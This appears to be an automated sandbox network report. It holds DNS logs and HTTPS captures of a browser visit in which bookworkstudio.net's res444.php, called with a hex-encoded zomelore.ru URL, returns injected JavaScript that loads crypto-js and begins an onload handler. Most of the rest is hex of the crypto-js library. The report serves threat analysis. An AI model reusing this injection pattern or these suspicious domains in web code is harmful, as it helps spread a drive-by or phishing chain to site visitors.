                                                                                                                                                                                                          Dec 12, 2024 00:30:20.103652000 CET1.1.1.1192.168.2.40x6d2eNo error (0)westeurope-global.in.applicationinsights.azure.comgig-ai-prod-westeurope-global.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                          Dec 12, 2024 00:30:20.104897976 CET1.1.1.1192.168.2.40x8001No error (0)dc.services.visualstudio.comdc.applicationinsights.microsoft.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                          Dec 12, 2024 00:30:20.104897976 CET1.1.1.1192.168.2.40x8001No error (0)dc.applicationinsights.azure.comglobal.in.ai.monitor.azure.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                          Dec 12, 2024 00:30:20.104897976 CET1.1.1.1192.168.2.40x8001No error (0)global.in.ai.monitor.azure.comglobal.in.ai.privatelink.monitor.azure.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                          Dec 12, 2024 00:30:20.104897976 CET1.1.1.1192.168.2.40x8001No error (0)global.in.ai.privatelink.monitor.azure.comdc.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                          Dec 12, 2024 00:30:20.104897976 CET1.1.1.1192.168.2.40x8001No error (0)westeurope-global.in.applicationinsights.azure.comgig-ai-prod-westeurope-global.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                          Dec 12, 2024 00:30:21.223031998 CET1.1.1.1192.168.2.40x60c8No error (0)shed.dual-low.s-part-0035.t-0009.t-msedge.nets-part-0035.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                          Dec 12, 2024 00:30:21.223031998 CET1.1.1.1192.168.2.40x60c8No error (0)s-part-0035.t-0009.t-msedge.net13.107.246.63A (IP address)IN (0x0001)false
                                                                                                                                                                                                          Dec 12, 2024 00:31:22.351003885 CET1.1.1.1192.168.2.40x89f8No error (0)dc.services.visualstudio.comdc.applicationinsights.microsoft.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                          Dec 12, 2024 00:31:22.351003885 CET1.1.1.1192.168.2.40x89f8No error (0)dc.applicationinsights.azure.comglobal.in.ai.monitor.azure.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                          Dec 12, 2024 00:31:22.351003885 CET1.1.1.1192.168.2.40x89f8No error (0)global.in.ai.monitor.azure.comglobal.in.ai.privatelink.monitor.azure.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                          Dec 12, 2024 00:31:22.351003885 CET1.1.1.1192.168.2.40x89f8No error (0)global.in.ai.privatelink.monitor.azure.comdc.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                          Dec 12, 2024 00:31:22.351003885 CET1.1.1.1192.168.2.40x89f8No error (0)westeurope-global.in.applicationinsights.azure.comgig-ai-prod-westeurope-global.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                          Dec 12, 2024 00:31:22.351375103 CET1.1.1.1192.168.2.40xbfc1No error (0)dc.services.visualstudio.comdc.applicationinsights.microsoft.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                          Dec 12, 2024 00:31:22.351375103 CET1.1.1.1192.168.2.40xbfc1No error (0)dc.applicationinsights.azure.comglobal.in.ai.monitor.azure.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                          Dec 12, 2024 00:31:22.351375103 CET1.1.1.1192.168.2.40xbfc1No error (0)global.in.ai.monitor.azure.comglobal.in.ai.privatelink.monitor.azure.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                          Dec 12, 2024 00:31:22.351375103 CET1.1.1.1192.168.2.40xbfc1No error (0)global.in.ai.privatelink.monitor.azure.comdc.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                          Dec 12, 2024 00:31:22.351375103 CET1.1.1.1192.168.2.40xbfc1No error (0)westeurope-global.in.applicationinsights.azure.comgig-ai-prod-westeurope-global.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                          Dec 12, 2024 00:31:24.959213018 CET1.1.1.1192.168.2.40x9c94No error (0)dc.services.visualstudio.comdc.applicationinsights.microsoft.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                          Dec 12, 2024 00:31:24.959213018 CET1.1.1.1192.168.2.40x9c94No error (0)dc.applicationinsights.azure.comglobal.in.ai.monitor.azure.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                          Dec 12, 2024 00:31:24.959213018 CET1.1.1.1192.168.2.40x9c94No error (0)global.in.ai.monitor.azure.comglobal.in.ai.privatelink.monitor.azure.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                          Dec 12, 2024 00:31:24.959213018 CET1.1.1.1192.168.2.40x9c94No error (0)global.in.ai.privatelink.monitor.azure.comdc.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                          Dec 12, 2024 00:31:24.959213018 CET1.1.1.1192.168.2.40x9c94No error (0)westeurope-global.in.applicationinsights.azure.comgig-ai-prod-westeurope-global.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                          Dec 12, 2024 00:31:25.154012918 CET1.1.1.1192.168.2.40x513aNo error (0)dc.services.visualstudio.comdc.applicationinsights.microsoft.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                          Dec 12, 2024 00:31:25.154012918 CET1.1.1.1192.168.2.40x513aNo error (0)dc.applicationinsights.azure.comglobal.in.ai.monitor.azure.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                          Dec 12, 2024 00:31:25.154012918 CET1.1.1.1192.168.2.40x513aNo error (0)global.in.ai.monitor.azure.comglobal.in.ai.privatelink.monitor.azure.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                          Dec 12, 2024 00:31:25.154012918 CET1.1.1.1192.168.2.40x513aNo error (0)global.in.ai.privatelink.monitor.azure.comdc.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                          Dec 12, 2024 00:31:25.154012918 CET1.1.1.1192.168.2.40x513aNo error (0)westeurope-global.in.applicationinsights.azure.comgig-ai-prod-westeurope-global.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                          • bookworkstudio.net
                                                                                                                                                                                                          • cdnjs.cloudflare.com
                                                                                                                                                                                                          • 21.zomelore.ru
                                                                                                                                                                                                          • https:
                                                                                                                                                                                                            • code.jquery.com
                                                                                                                                                                                                            • challenges.cloudflare.com
                                                                                                                                                                                                            • mbigqvptso9zh4kbsf1xwmhkf9pcroq3g0vbws0rgv5970xbtzluqzxc.bfcgpixdwnw.ru
                                                                                                                                                                                                            • app.powerbi.com
                                                                                                                                                                                                          • a.nel.cloudflare.com
                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                          0192.168.2.44973769.49.245.1724431748C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                          2024-12-11 23:28:43 UTC654OUTGET /res444.php?2-68747470733a2f2f32312e7a6f6d656c6f72652e72752f72774448725657452f-drongo HTTP/1.1
                                                                                                                                                                                                          Host: bookworkstudio.net
                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                          Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                          2024-12-11 23:28:43 UTC196INHTTP/1.1 200 OK
                                                                                                                                                                                                          Date: Wed, 11 Dec 2024 23:28:42 GMT
                                                                                                                                                                                                          Server: Apache
                                                                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                          Content-Type: text/javascript;charset=UTF-8
                                                                                                                                                                                                          2024-12-11 23:28:43 UTC1968INData Raw: 37 61 34 0d 0a 20 20 20 20 76 61 72 20 47 79 62 49 72 73 44 77 57 56 47 43 6e 54 76 6e 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 0d 0a 47 79 62 49 72 73 44 77 57 56 47 43 6e 54 76 6e 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 73 72 63 22 2c 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 63 72 79 70 74 6f 2d 6a 73 2f 34 2e 30 2e 30 2f 63 72 79 70 74 6f 2d 6a 73 2e 6d 69 6e 2e 6a 73 22 29 3b 0d 0a 64 6f 63 75 6d 65 6e 74 2e 68 65 61 64 2e 61 70 70 65 6e 64 28 47 79 62 49 72 73 44 77 57 56 47 43 6e 54 76 6e 29 3b 0d 0a 47 79 62 49 72 73 44 77 57 56 47 43 6e 54 76 6e 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29
                                                                                                                                                                                                          Data Ascii: 7a4 var GybIrsDwWVGCnTvn = document.createElement("script");GybIrsDwWVGCnTvn.setAttribute("src","https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.0.0/crypto-js.min.js");document.head.append(GybIrsDwWVGCnTvn);GybIrsDwWVGCnTvn.onload=function()


                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                          1192.168.2.44973869.49.245.1724431748C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                          2024-12-11 23:28:44 UTC426OUTGET /res444.php?2-68747470733a2f2f32312e7a6f6d656c6f72652e72752f72774448725657452f-drongo HTTP/1.1
                                                                                                                                                                                                          Host: bookworkstudio.net
                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                          2024-12-11 23:28:45 UTC196INHTTP/1.1 200 OK
                                                                                                                                                                                                          Date: Wed, 11 Dec 2024 23:28:44 GMT
                                                                                                                                                                                                          Server: Apache
                                                                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                          Content-Type: text/javascript;charset=UTF-8
                                                                                                                                                                                                          2024-12-11 23:28:45 UTC1976INData Raw: 37 61 63 0d 0a 20 20 20 20 76 61 72 20 49 75 71 47 76 6c 6c 4d 4b 7a 76 63 6d 74 5a 6f 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 0d 0a 49 75 71 47 76 6c 6c 4d 4b 7a 76 63 6d 74 5a 6f 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 73 72 63 22 2c 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 63 72 79 70 74 6f 2d 6a 73 2f 34 2e 30 2e 30 2f 63 72 79 70 74 6f 2d 6a 73 2e 6d 69 6e 2e 6a 73 22 29 3b 0d 0a 64 6f 63 75 6d 65 6e 74 2e 68 65 61 64 2e 61 70 70 65 6e 64 28 49 75 71 47 76 6c 6c 4d 4b 7a 76 63 6d 74 5a 6f 29 3b 0d 0a 49 75 71 47 76 6c 6c 4d 4b 7a 76 63 6d 74 5a 6f 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29
                                                                                                                                                                                                          Data Ascii: 7ac var IuqGvllMKzvcmtZo = document.createElement("script");IuqGvllMKzvcmtZo.setAttribute("src","https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.0.0/crypto-js.min.js");document.head.append(IuqGvllMKzvcmtZo);IuqGvllMKzvcmtZo.onload=function()


                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                          2192.168.2.449740104.17.24.144431748C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                          2024-12-11 23:28:45 UTC526OUTGET /ajax/libs/crypto-js/4.0.0/crypto-js.min.js HTTP/1.1
                                                                                                                                                                                                          Host: cdnjs.cloudflare.com
                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                          2024-12-11 23:28:46 UTC956INHTTP/1.1 200 OK
                                                                                                                                                                                                          Date: Wed, 11 Dec 2024 23:28:46 GMT
                                                                                                                                                                                                          Content-Type: application/javascript; charset=utf-8
                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                                                                          Cache-Control: public, max-age=30672000
                                                                                                                                                                                                          ETag: W/"5eb03e2d-bb78"
                                                                                                                                                                                                          Last-Modified: Mon, 04 May 2020 16:09:17 GMT
                                                                                                                                                                                                          cf-cdnjs-via: cfworker/kv
                                                                                                                                                                                                          Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                          Timing-Allow-Origin: *
                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                          CF-Cache-Status: HIT
                                                                                                                                                                                                          Age: 203756
                                                                                                                                                                                                          Expires: Mon, 01 Dec 2025 23:28:46 GMT
                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MZQirhqz5K5%2BQ6vluZKg68zSpUtXVVLm%2FTJyXrpq5c8rbbB7fjeyncfxPNlp2P5SMMYfhFWmOkwWyNCZyLX6SshczA0prOmcTd2QgLRCb9E34WycQKFZlhoQasHqw80frMmI1mgP"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                          NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                          Strict-Transport-Security: max-age=15780000
                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                          CF-RAY: 8f0940c0283c41ff-EWR
                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                          2024-12-11 23:28:46 UTC413INData Raw: 37 62 66 35 0d 0a 21 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 78 70 6f 72 74 73 3d 65 28 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 5b 5d 2c 65 29 3a 74 2e 43 72 79 70 74 6f 4a 53 3d 65 28 29 7d 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 68 2c 74 2c 65 2c 72 2c 69 2c 6e 2c 66 2c 6f 2c 73 2c 63 2c 61 2c 6c 2c 64 2c 6d 2c 78 2c 62 2c 48 2c 7a 2c 41 2c 75 2c 70 2c 5f 2c 76 2c 79 2c 67 2c 42 2c 77 2c 6b 2c 53 2c 43 2c 44 2c 45 2c 52 2c 4d 2c 46 2c 50 2c 57 2c 4f 2c 49 2c 55 2c 4b 2c 58 2c 4c 2c 6a 2c 4e 2c 54 2c 71 2c 5a
                                                                                                                                                                                                          Data Ascii: 7bf5!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var h,t,e,r,i,n,f,o,s,c,a,l,d,m,x,b,H,z,A,u,p,_,v,y,g,B,w,k,S,C,D,E,R,M,F,P,W,O,I,U,K,X,L,j,N,T,q,Z
                                                                                                                                                                                                          2024-12-11 23:28:46 UTC1369INData Raw: 6e 64 6f 77 2e 63 72 79 70 74 6f 29 2c 21 74 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 26 26 77 69 6e 64 6f 77 2e 6d 73 43 72 79 70 74 6f 26 26 28 74 3d 77 69 6e 64 6f 77 2e 6d 73 43 72 79 70 74 6f 29 2c 21 74 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 26 26 67 6c 6f 62 61 6c 2e 63 72 79 70 74 6f 26 26 28 74 3d 67 6c 6f 62 61 6c 2e 63 72 79 70 74 6f 29 2c 21 74 26 26 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 72 65 71 75 69 72 65 29 74 72 79 7b 74 3d 72 65 71 75 69 72 65 28 22 63 72 79 70 74 6f 22 29 7d 63 61 74 63 68 28 74 29 7b 7d 66 75 6e 63 74 69 6f 6e 20 69 28 29 7b 69 66 28 74 29 7b 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 74 2e
                                                                                                                                                                                                          Data Ascii: ndow.crypto),!t&&"undefined"!=typeof window&&window.msCrypto&&(t=window.msCrypto),!t&&"undefined"!=typeof global&&global.crypto&&(t=global.crypto),!t&&"function"==typeof require)try{t=require("crypto")}catch(t){}function i(){if(t){if("function"==typeof t.
                                                                                                                                                                                                          2024-12-11 23:28:46 UTC1369INData Raw: 3c 6e 3b 6f 2b 2b 29 7b 76 61 72 20 73 3d 72 5b 6f 3e 3e 3e 32 5d 3e 3e 3e 32 34 2d 6f 25 34 2a 38 26 32 35 35 3b 65 5b 69 2b 6f 3e 3e 3e 32 5d 7c 3d 73 3c 3c 32 34 2d 28 69 2b 6f 29 25 34 2a 38 7d 65 6c 73 65 20 66 6f 72 28 6f 3d 30 3b 6f 3c 6e 3b 6f 2b 3d 34 29 65 5b 69 2b 6f 3e 3e 3e 32 5d 3d 72 5b 6f 3e 3e 3e 32 5d 3b 72 65 74 75 72 6e 20 74 68 69 73 2e 73 69 67 42 79 74 65 73 2b 3d 6e 2c 74 68 69 73 7d 2c 63 6c 61 6d 70 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 74 68 69 73 2e 77 6f 72 64 73 2c 65 3d 74 68 69 73 2e 73 69 67 42 79 74 65 73 3b 74 5b 65 3e 3e 3e 32 5d 26 3d 34 32 39 34 39 36 37 32 39 35 3c 3c 33 32 2d 65 25 34 2a 38 2c 74 2e 6c 65 6e 67 74 68 3d 6c 2e 63 65 69 6c 28 65 2f 34 29 7d 2c 63 6c 6f 6e 65 3a 66 75 6e 63 74 69 6f 6e
                                                                                                                                                                                                          Data Ascii: <n;o++){var s=r[o>>>2]>>>24-o%4*8&255;e[i+o>>>2]|=s<<24-(i+o)%4*8}else for(o=0;o<n;o+=4)e[i+o>>>2]=r[o>>>2];return this.sigBytes+=n,this},clamp:function(){var t=this.words,e=this.sigBytes;t[e>>>2]&=4294967295<<32-e%4*8,t.length=l.ceil(e/4)},clone:function
                                                                                                                                                                                                          2024-12-11 23:28:46 UTC1369INData Raw: 2c 74 68 69 73 2e 5f 64 61 74 61 2e 63 6f 6e 63 61 74 28 74 29 2c 74 68 69 73 2e 5f 6e 44 61 74 61 42 79 74 65 73 2b 3d 74 2e 73 69 67 42 79 74 65 73 7d 2c 5f 70 72 6f 63 65 73 73 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 2c 72 3d 74 68 69 73 2e 5f 64 61 74 61 2c 69 3d 72 2e 77 6f 72 64 73 2c 6e 3d 72 2e 73 69 67 42 79 74 65 73 2c 6f 3d 74 68 69 73 2e 62 6c 6f 63 6b 53 69 7a 65 2c 73 3d 6e 2f 28 34 2a 6f 29 2c 63 3d 28 73 3d 74 3f 6c 2e 63 65 69 6c 28 73 29 3a 6c 2e 6d 61 78 28 28 30 7c 73 29 2d 74 68 69 73 2e 5f 6d 69 6e 42 75 66 66 65 72 53 69 7a 65 2c 30 29 29 2a 6f 2c 61 3d 6c 2e 6d 69 6e 28 34 2a 63 2c 6e 29 3b 69 66 28 63 29 7b 66 6f 72 28 76 61 72 20 68 3d 30 3b 68 3c 63 3b 68 2b 3d 6f 29 74 68 69 73 2e 5f 64 6f 50 72 6f 63 65 73 73 42
                                                                                                                                                                                                          Data Ascii: ,this._data.concat(t),this._nDataBytes+=t.sigBytes},_process:function(t){var e,r=this._data,i=r.words,n=r.sigBytes,o=this.blockSize,s=n/(4*o),c=(s=t?l.ceil(s):l.max((0|s)-this._minBufferSize,0))*o,a=l.min(4*c,n);if(c){for(var h=0;h<c;h+=o)this._doProcessB
                                                                                                                                                                                                          2024-12-11 23:28:46 UTC1369INData Raw: 3f 69 3d 30 3a 2b 2b 69 29 3a 2b 2b 72 29 3a 2b 2b 65 2c 74 3d 30 2c 74 2b 3d 65 3c 3c 31 36 2c 74 2b 3d 72 3c 3c 38 2c 74 2b 3d 69 7d 65 6c 73 65 20 74 2b 3d 31 3c 3c 32 34 3b 72 65 74 75 72 6e 20 74 7d 66 75 6e 63 74 69 6f 6e 20 52 74 28 29 7b 66 6f 72 28 76 61 72 20 74 3d 74 68 69 73 2e 5f 58 2c 65 3d 74 68 69 73 2e 5f 43 2c 72 3d 30 3b 72 3c 38 3b 72 2b 2b 29 66 74 5b 72 5d 3d 65 5b 72 5d 3b 65 5b 30 5d 3d 65 5b 30 5d 2b 31 32 39 35 33 30 37 35 39 37 2b 74 68 69 73 2e 5f 62 7c 30 2c 65 5b 31 5d 3d 65 5b 31 5d 2b 33 35 34 35 30 35 32 33 37 31 2b 28 65 5b 30 5d 3e 3e 3e 30 3c 66 74 5b 30 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 32 5d 3d 65 5b 32 5d 2b 38 38 36 32 36 33 30 39 32 2b 28 65 5b 31 5d 3e 3e 3e 30 3c 66 74 5b 31 5d 3e 3e 3e 30 3f 31 3a 30
                                                                                                                                                                                                          Data Ascii: ?i=0:++i):++r):++e,t=0,t+=e<<16,t+=r<<8,t+=i}else t+=1<<24;return t}function Rt(){for(var t=this._X,e=this._C,r=0;r<8;r++)ft[r]=e[r];e[0]=e[0]+1295307597+this._b|0,e[1]=e[1]+3545052371+(e[0]>>>0<ft[0]>>>0?1:0)|0,e[2]=e[2]+886263092+(e[1]>>>0<ft[1]>>>0?1:0
                                                                                                                                                                                                          2024-12-11 23:28:46 UTC1369INData Raw: 5d 3e 3e 3e 30 3c 77 74 5b 34 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 36 5d 3d 65 5b 36 5d 2b 31 32 39 35 33 30 37 35 39 37 2b 28 65 5b 35 5d 3e 3e 3e 30 3c 77 74 5b 35 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 37 5d 3d 65 5b 37 5d 2b 33 35 34 35 30 35 32 33 37 31 2b 28 65 5b 36 5d 3e 3e 3e 30 3c 77 74 5b 36 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 74 68 69 73 2e 5f 62 3d 65 5b 37 5d 3e 3e 3e 30 3c 77 74 5b 37 5d 3e 3e 3e 30 3f 31 3a 30 3b 66 6f 72 28 72 3d 30 3b 72 3c 38 3b 72 2b 2b 29 7b 76 61 72 20 69 3d 74 5b 72 5d 2b 65 5b 72 5d 2c 6e 3d 36 35 35 33 35 26 69 2c 6f 3d 69 3e 3e 3e 31 36 2c 73 3d 28 28 6e 2a 6e 3e 3e 3e 31 37 29 2b 6e 2a 6f 3e 3e 3e 31 35 29 2b 6f 2a 6f 2c 63 3d 28 28 34 32 39 34 39 30 31 37 36 30 26 69 29 2a 69 7c 30 29 2b 28 28
                                                                                                                                                                                                          Data Ascii: ]>>>0<wt[4]>>>0?1:0)|0,e[6]=e[6]+1295307597+(e[5]>>>0<wt[5]>>>0?1:0)|0,e[7]=e[7]+3545052371+(e[6]>>>0<wt[6]>>>0?1:0)|0,this._b=e[7]>>>0<wt[7]>>>0?1:0;for(r=0;r<8;r++){var i=t[r]+e[r],n=65535&i,o=i>>>16,s=((n*n>>>17)+n*o>>>15)+o*o,c=((4294901760&i)*i|0)+((
                                                                                                                                                                                                          2024-12-11 23:28:46 UTC1369INData Raw: 2a 32 2c 61 3d 73 7c 63 3b 69 5b 6e 3e 3e 3e 32 5d 7c 3d 61 3c 3c 32 34 2d 6e 25 34 2a 38 2c 6e 2b 2b 7d 72 65 74 75 72 6e 20 68 2e 63 72 65 61 74 65 28 69 2c 6e 29 7d 28 74 2c 65 2c 69 29 7d 2c 5f 6d 61 70 3a 22 41 42 43 44 45 46 47 48 49 4a 4b 4c 4d 4e 4f 50 51 52 53 54 55 56 57 58 59 5a 61 62 63 64 65 66 67 68 69 6a 6b 6c 6d 6e 6f 70 71 72 73 74 75 76 77 78 79 7a 30 31 32 33 34 35 36 37 38 39 2b 2f 3d 22 7d 2c 66 75 6e 63 74 69 6f 6e 28 6c 29 7b 76 61 72 20 74 3d 62 74 2c 65 3d 74 2e 6c 69 62 2c 72 3d 65 2e 57 6f 72 64 41 72 72 61 79 2c 69 3d 65 2e 48 61 73 68 65 72 2c 6e 3d 74 2e 61 6c 67 6f 2c 48 3d 5b 5d 3b 21 66 75 6e 63 74 69 6f 6e 28 29 7b 66 6f 72 28 76 61 72 20 74 3d 30 3b 74 3c 36 34 3b 74 2b 2b 29 48 5b 74 5d 3d 34 32 39 34 39 36 37 32 39 36
                                                                                                                                                                                                          Data Ascii: *2,a=s|c;i[n>>>2]|=a<<24-n%4*8,n++}return h.create(i,n)}(t,e,i)},_map:"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/="},function(l){var t=bt,e=t.lib,r=e.WordArray,i=e.Hasher,n=t.algo,H=[];!function(){for(var t=0;t<64;t++)H[t]=4294967296
                                                                                                                                                                                                          2024-12-11 23:28:46 UTC1369INData Raw: 6d 2c 78 2c 62 2c 42 2c 35 2c 48 5b 32 38 5d 29 2c 62 3d 41 28 62 2c 53 2c 6d 2c 78 2c 61 2c 39 2c 48 5b 32 39 5d 29 2c 78 3d 41 28 78 2c 62 2c 53 2c 6d 2c 75 2c 31 34 2c 48 5b 33 30 5d 29 2c 53 3d 43 28 53 2c 6d 3d 41 28 6d 2c 78 2c 62 2c 53 2c 67 2c 32 30 2c 48 5b 33 31 5d 29 2c 78 2c 62 2c 66 2c 34 2c 48 5b 33 32 5d 29 2c 62 3d 43 28 62 2c 53 2c 6d 2c 78 2c 70 2c 31 31 2c 48 5b 33 33 5d 29 2c 78 3d 43 28 78 2c 62 2c 53 2c 6d 2c 79 2c 31 36 2c 48 5b 33 34 5d 29 2c 6d 3d 43 28 6d 2c 78 2c 62 2c 53 2c 77 2c 32 33 2c 48 5b 33 35 5d 29 2c 53 3d 43 28 53 2c 6d 2c 78 2c 62 2c 63 2c 34 2c 48 5b 33 36 5d 29 2c 62 3d 43 28 62 2c 53 2c 6d 2c 78 2c 6c 2c 31 31 2c 48 5b 33 37 5d 29 2c 78 3d 43 28 78 2c 62 2c 53 2c 6d 2c 75 2c 31 36 2c 48 5b 33 38 5d 29 2c 6d 3d 43
